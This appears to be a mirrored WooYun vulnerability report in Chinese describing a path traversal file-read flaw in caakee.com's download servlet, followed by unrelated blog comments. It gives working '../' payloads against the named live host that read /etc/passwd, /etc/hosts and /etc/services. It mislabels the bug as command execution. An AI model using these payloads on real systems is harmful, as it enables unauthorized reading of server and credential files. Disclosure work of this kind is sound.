财客在线某处任意文件读取漏洞
| 漏洞标题 | 财客在线某处任意文件读取漏洞 |
|---|---|
| 相关厂商 | 财客在线 |
| 漏洞作者 | 路人甲 |
| 提交时间 | 2015-07-29 22:07 |
| 公开时间 | 2015-09-12 22:08 |
| 漏洞类型 | 命令执行 |
| 危害等级 | 高 |
| 自评Rank | 20 |
| 漏洞状态 | 未联系到厂商或者厂商积极忽略 |
| Tags标签 | 补丁不及时,远程命令执行 |
漏洞详情
通过下载用户的一个XLS表格
获得下载地址:
http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls
在filename参数写入../../../../../../../../../../etc/passwd
即可弹出下载
打开后
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
漏洞证明:
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts
zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/services
修复方案:
版权声明:转载请注明来源 路人甲 @ 乌云
【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】
Tags: 补丁不及时 远程命令执行
正文到此结束
热门推荐
相关文章
近期评论
-
不会英语啊。
-
前100名用户会展示特殊的纪念徽章
-
-
https://pplx.ai/floraliu4199466 这个链接打不开是什么原因?
-
-
-
-
来看看,最近更新了一波,顺着友联过来的,几年过去了,网站越搞越好,厉害
-
哥太牛了
-
是呀,看您的IP显示在美国,还以为您移民了
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
